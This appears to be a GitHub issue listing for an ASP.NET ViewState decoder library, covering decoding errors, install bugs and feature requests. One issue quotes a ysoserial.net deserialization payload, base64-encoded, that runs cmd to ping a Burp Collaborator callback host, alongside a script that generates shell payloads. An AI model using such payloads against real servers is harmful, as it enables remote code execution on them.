yuvadm / viewstate Goto Github PK

View Code? Open in Web Editor NEW

97.0 5.0 13.0 148 KB

ASP.NET View State Decoder

License: MIT License

Python 100.00%

python python3 dotnet security viewstate web-security scraping asp-net hacktoberfest

viewstate's People

Contributors

Stargazers

Watchers

Forkers

biguncle gdraperi skmendez omidnasri elamaran619 tiberiud eugenezaytsev jonathanablanida rpimonitrbtch jarryxy simon-hjy oakkaya devprop

viewstate's Issues

unhashable type: 'list'

When I decode the _viewstate string, report TypeError: unhashable type: 'list'
The string is saved in the attached txt file.

viewstate.txt

Unknown marker 12

Getting the error viewstate.exceptions.ViewStateException: Unknown marker 12 when decoding a Viewstate from a Mono app.
Here is the Viewstate:

/wEMDAwQAgAADgEMBQEMEAIAAA4DDAUBDBACAAAOBgwFAQwQAgwPAQEEVGV4dAETQWRkIFlvdXIgRmlyc3QgTm90ZQAAAAwFAwwQAgwPAQEHVmlzaWJsZQkAAAAMBQUMEAIMAA8EAQhyZXF1aXJlZAEEdHJ1ZQEEdHlwZQEEdGV4dAELcGxhY2Vob2xkZXIBFlNldCBuYW1lIGZvciB5b3VyIG5vdGUBBWNsYXNzARVmb3JtLWNvbnRyb2wgaW5wdXQtbGcAAAwFBwwQAgwADwMCAwACBAACBwABF1N0b3JlIHNvbWUgc2VjcmV0cyBoZXJlAgkAAQxmb3JtLWNvbnRyb2wAAAwFCQwQAgwADwECCQABFmJ0biBidG4tcHJpbWFyeSBidG4tbGcAAAwFCwwQAgwPAQICAAkPAQIJAAINAAAADAUDDBACDwECAgAJAA4CDAUFDBACDAAPAQIJAAINAAAADAUHDBACDAAPAQIJAAINAAAADAUFDBACDwECAgAJAA4BDAUBDBACDAAPAQIJAAINAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

YSOSerial.net Payloads could not be processed

Traceback (most recent call last):
  File "genvs.py", line 56, in <module>
    main()
  File "genvs.py", line 48, in main
    newpayload = gen_shell_payload("ping google.com")
  File "genvs.py", line 14, in gen_shell_payload
    analyze_vs('/wEyxAcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADmBTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBwaW5nIHB3cGRsb2M5YXRzNDJobzk2N3hhMG9nYmQyanM3aC5idXJwY29sbGFib3JhdG9yLm5ldCIgU3RhbmRhcmRFcnJvckVuY29kaW5nPSJ7eDpOdWxsfSIgU3RhbmRhcmRPdXRwdXRFbmNvZGluZz0ie3g6TnVsbH0iIFVzZXJOYW1lPSIiIFBhc3N3b3JkPSJ7eDpOdWxsfSIgRG9tYWluPSIiIExvYWRVc2VyUHJvZmlsZT0iRmFsc2UiIEZpbGVOYW1lPSJjbWQiIC8+DQogICAgICA8L3NkOlByb2Nlc3MuU3RhcnRJbmZvPg0KICAgIDwvc2Q6UHJvY2Vzcz4NCiAgPC9PYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQo8L09iamVjdERhdGFQcm92aWRlcj4L+sRLt8icO/sVOPISqIdKQ5mjFwM=')
  File "genvs.py", line 30, in analyze_vs
    vs.decode()
  File "/Users/exploitio/Library/Python/3.8/lib/python/site-packages/viewstate/viewstate.py", line 44, in decode
    self.decoded, self.remainder = Parser.parse(self.body)
  File "/Users/exploitio/Library/Python/3.8/lib/python/site-packages/viewstate/parse.py", line 37, in parse
    raise ViewStateException("Unknown marker {}".format(marker))
viewstate.exceptions.ViewStateException: Unknown marker 50

I am decoding ysoserial.net payloads. and I get Unknown marker 50 Error!
Please help me!

Support datetime parsing

Datetime encoding is still unknown, though some test cases do exist:

def test_datetime(self):
    vs = ViewState()
    vs.raw = b'\xff\x01\x06\x000Po\x9b\x87\xd5\x88'
    assert vs.decode() == datetime(2018, 3, 11, 22)
    vs.raw = b'\xff\x01\x06\x00\xf0\xb9\x99d\x88\xd5\x88'
    assert vs.decode() == datetime(2018, 3, 12, 22)

Proper datetime parsing should be supported

ViewStateException: Cannot decode invalid viewstate, bad preamble

Hi,

I'm trying to decode a ViewState from

<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="R764/r3QPGEcug7NDCf691JVWHHD..........

But i get this error

ubuntu@vboxubuntu:~$ BASE64='R764/r3QPGEcug7NDCf691JVWHHD..........
ubuntu@vboxubuntu:~$ echo $BASE64 | python3 -m viewstate
Traceback (most recent call last):
  File "/usr/lib/python3.6/runpy.py", line 193, in _run_module_as_main
    "__main__", mod_spec)
  File "/usr/lib/python3.6/runpy.py", line 85, in _run_code
    exec(code, run_globals)
  File "/home/ubuntu/.local/lib/python3.6/site-packages/viewstate/__main__.py", line 20, in <module>
    main(raw)
  File "/home/ubuntu/.local/lib/python3.6/site-packages/viewstate/__main__.py", line 15, in main
    pp.pprint(vs.decode())
  File "/home/ubuntu/.local/lib/python3.6/site-packages/viewstate/viewstate.py", line 43, in decode
    raise ViewStateException('Cannot decode invalid viewstate, bad preamble')
viewstate.exceptions.ViewStateException: Cannot decode invalid viewstate, bad preamble

Although, it works well with the test data

ubuntu@vboxubuntu:~$ BASE64='/wEPBQVhYmNkZQ9nAgE='
ubuntu@vboxubuntu:~$ echo $BASE64 | python3 -m viewstate
('abcde', (True, 1))

Dectect when mac not enabled

Hey,

Great tool it's been really handy but i am trying to work a way to detect when the mac is not enabled but so far kept coming up with ways for false negatives and false positives.

is there a clear way you would suggest? i.e so am looking for when a site has Page.EnableViewStateMac set to false.

Support MAC values

Most viewstates have MAC values appended, we should probably support parsing and returning them

Add sphinx documentation

Based on the awesome template https://github.com/DalyaG/Sphinx185 by @DalyaG

Issue with decoding the following viewstate

Hello there,

I'm not familiar AT ALL with viewstate but I needed to decode some viewstate from scrapping.

I have viewstate that seems to be valid as it works with http://viewstatedecoder.azurewebsites.net/
but it doesn't with the library.
It raise an exception:

ViewStateException: Unable to parse remainder of 64615 bytes b'\n\x91\x01\x1e\x04Text\x051<b>Vous n'

Thanks for your time.

Here's the b64 encoded viewstate: https://gist.github.com/yuvadm/09524e56f2c6376e726d4f5b8c87be39

Color parsing (as opposed to simple RGBA values) is still unknown. Color values seems to follow the structure of a 0x0a marker followed by two bytes, and probably map to a predetermined set of colors.

IndexError when decoding (old?) viewstate

This is a viewstate from an IIS/7.5 server.

Viewstate:

/wEPDwUJOTM0NDI1NDMxD2QWBGYPFgIeBFRleHQFbTwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFN0cmljdC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS1zdHJpY3QuZHRkIj5kAgQQZGQWAgIBD2QWBGYPZBYEZg9kFgIFC3dwOTI5MzI2MjM0D2QWAmYPZBYSAgEPDxYCHwAFE1JldHVybmluZyBDdXN0b21lcnNkZAIDDxYCHwAFbTxkaXYgY2xhc3M9InJjV2VsY29tZSI+UGxlYXNlIGxvZ2luIHVzaW5nIHRoZSB1c2VybmFtZSBhbmQgcGFzc3dvcmQgeW91IHJlY2VpdmVkIHdoZW4geW91IHNpZ25lZCB1cC4gPC9kaXY+DQpkAgUPDxYCHwAFCVVzZXJuYW1lOmRkAgcPDxYCHhBBdXRvQ29tcGxldGVUeXBlCyoqU3lzdGVtLldlYi5VSS5XZWJDb250cm9scy5BdXRvQ29tcGxldGVUeXBlARYCHgxhdXRvY29tcGxldGUFA29mZmQCCQ8PFgIfAAUJUGFzc3dvcmQ6ZGQCCw8PFgIfAQsrBAEWAh8CBQNvZmZkAg0PZBYCAgEPDxYCHwAFHURpZCB5b3UgZm9yZ2V0IHlvdXIgcGFzc3dvcmQ/FgIeB29uY2xpY2sFDXJldHVybiBmYWxzZTtkAg8PZBYCAgMPZBYCAgEPFgIeA3NyYwVDaHR0cHM6Ly9vcmRlcnMuaWdkZ2xhc3MuY29tOjQ0My9lU291cmNlMy8vaW1hZ2VzLy9sb2FkaW5nX0xvZ2luLmdpZmQCFw8WAh8AZWQCAg9kFgQCCQ9kFgwCAQ8PFgIfAAUUU2l0ZSBNb2RlOiBGdWxsIFNpdGVkZAILDw8WAh8AZWRkAhEPEGRkFgBkAhUPEGRkFgBkAhkPEGQQFQMSU2VsZWN0IEEgUGFuZS9ab25lD25ld0N1c3RvbWVyUGFuZRVyZXR1cm5pbmdDdXN0b21lclBhbmUVAxJTZWxlY3QgQSBQYW5lL1pvbmUPbmV3Q3VzdG9tZXJQYW5lFXJldHVybmluZ0N1c3RvbWVyUGFuZRQrAwNnZ2cWAWZkAicPFgIeB1Zpc2libGVoZAILDw8WAh4ISW1hZ2VVcmwFRWh0dHBzOi8vb3JkZXJzLmlnZGdsYXNzLmNvbTo0NDMvZVNvdXJjZTMvL2ltYWdlcy8vbG9hZGluZ19ibG9ja1VJLmdpZmRkAgEPZBYGAgEPDxYCHwVoZBYMAgEPDxYCHwAFBlNlbGVjdGRkAgUPDxYCHwAFBlN1Ym1pdGRkAgcPDxYCHwAFBlNlYXJjaGRkAgkPEGRkFgBkAgsPEGRkFgBkAg8PDxYCHwAFBlNlYXJjaGRkAgIPPCsAEgQAFCsACQ8WAh4OUGFydENocm9tZVR5cGUCAmRkZGQWBB4LQm9yZGVyQ29sb3IKpAEeBF8hU0ICEBYEHghDc3NDbGFzcwUSd2VicGFydF90aXRsZV9oaWRlHwkCAmRkZAIWAh8FaAcWAh8FaBAWBB4LQm9yZGVyU3R5bGULKiVTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLkJvcmRlclN0eWxlAR8JAkBkAgMPPCsAEgQAFCsACQ8WAh8HAgJkZGRkFgQfCAqkAR8JAhAWBB8KBRJ3ZWJwYXJ0X3RpdGxlX2hpZGUfCQICZGRkAhYCHwVoBxYCHwVoEBYEHwsLKwUBHwkCQGRk+ajgpVPQKk0DfqIpz9BVt6PhM+PFyUodqFF0sMA3YVI=

Error:

Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/lib/python3.11/site-packages/viewstate/viewstate.py", line 44, in decode
    self.decoded, self.remainder = Parser.parse(self.body)
                                   ^^^^^^^^^^^^^^^^^^^^^^^
  File "/lib/python3.11/site-packages/viewstate/parse.py", line 35, in parse
    return Parser.registry[marker].parse(remain)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/lib/python3.11/site-packages/viewstate/parse.py", line 136, in parse
    first, remain = Parser.parse(b)
                    ^^^^^^^^^^^^^^^
  File "/lib/python3.11/site-packages/viewstate/parse.py", line 35, in parse
    return Parser.registry[marker].parse(remain)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/lib/python3.11/site-packages/viewstate/parse.py", line 137, in parse
    second, remain = Parser.parse(remain)
                     ^^^^^^^^^^^^^^^^^^^^
  File "/lib/python3.11/site-packages/viewstate/parse.py", line 35, in parse
    return Parser.registry[marker].parse(remain)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/lib/python3.11/site-packages/viewstate/parse.py", line 137, in parse
    second, remain = Parser.parse(remain)
                     ^^^^^^^^^^^^^^^^^^^^
  File "/lib/python3.11/site-packages/viewstate/parse.py", line 35, in parse
    return Parser.registry[marker].parse(remain)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/lib/python3.11/site-packages/viewstate/parse.py", line 202, in parse
    val, remain = Parser.parse(remain)
                  ^^^^^^^^^^^^^^^^^^^^
  File "/lib/python3.11/site-packages/viewstate/parse.py", line 35, in parse
    return Parser.registry[marker].parse(remain)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/lib/python3.11/site-packages/viewstate/parse.py", line 148, in parse
    third, remain = Parser.parse(remain)
                    ^^^^^^^^^^^^^^^^^^^^
  File "/lib/python3.11/site-packages/viewstate/parse.py", line 35, in parse
    return Parser.registry[marker].parse(remain)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/lib/python3.11/site-packages/viewstate/parse.py", line 202, in parse
    val, remain = Parser.parse(remain)
                  ^^^^^^^^^^^^^^^^^^^^
  File "/lib/python3.11/site-packages/viewstate/parse.py", line 35, in parse
    return Parser.registry[marker].parse(remain)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/lib/python3.11/site-packages/viewstate/parse.py", line 137, in parse
    second, remain = Parser.parse(remain)
                     ^^^^^^^^^^^^^^^^^^^^
  File "/lib/python3.11/site-packages/viewstate/parse.py", line 35, in parse
    return Parser.registry[marker].parse(remain)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/lib/python3.11/site-packages/viewstate/parse.py", line 202, in parse
    val, remain = Parser.parse(remain)
                  ^^^^^^^^^^^^^^^^^^^^
  File "/lib/python3.11/site-packages/viewstate/parse.py", line 35, in parse
    return Parser.registry[marker].parse(remain)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/lib/python3.11/site-packages/viewstate/parse.py", line 137, in parse
    second, remain = Parser.parse(remain)
                     ^^^^^^^^^^^^^^^^^^^^
  File "/lib/python3.11/site-packages/viewstate/parse.py", line 35, in parse
    return Parser.registry[marker].parse(remain)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/lib/python3.11/site-packages/viewstate/parse.py", line 202, in parse
    val, remain = Parser.parse(remain)
                  ^^^^^^^^^^^^^^^^^^^^
  File "/lib/python3.11/site-packages/viewstate/parse.py", line 35, in parse
    return Parser.registry[marker].parse(remain)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/lib/python3.11/site-packages/viewstate/parse.py", line 136, in parse
    first, remain = Parser.parse(b)
                    ^^^^^^^^^^^^^^^
  File "/lib/python3.11/site-packages/viewstate/parse.py", line 35, in parse
    return Parser.registry[marker].parse(remain)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/lib/python3.11/site-packages/viewstate/parse.py", line 238, in parse
    l[idx] = val
    ~^^^^^
IndexError: list assignment index out of range

"NameError: name 'path' is not defined" when installing

Thanks for this package, very useful. I'm having trouble installing it, there doesn't seem to be a PIP package in the rep, and pip install via github fails, is there another installer I should use?

pip install git+git://github.com/yuvadm/viewstate.git

Collecting git+git://github.com/yuvadm/viewstate.git
  Cloning git://github.com/yuvadm/viewstate.git to /private/var/folders/xs/wmmjbz4s6mdgcqynwn46qtmr0000gn/T/pip-8t1_p1hd-build
    Complete output from command python setup.py egg_info:
    Traceback (most recent call last):
      File "<string>", line 1, in <module>
      File "/private/var/folders/xs/wmmjbz4s6mdgcqynwn46qtmr0000gn/T/pip-8t1_p1hd-build/setup.py", line 3, in <module>
        with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
    NameError: name 'path' is not defined

Optional decoded structure flattening

It might be useful to optionally return a flattened decoded data structure in cases where we only care about iterating over the values and searching for specific patterns.

Re-encoding viewstate

It would be nice to be able to decode a viewstate, change some parts of it, and then reserialize it back to base64.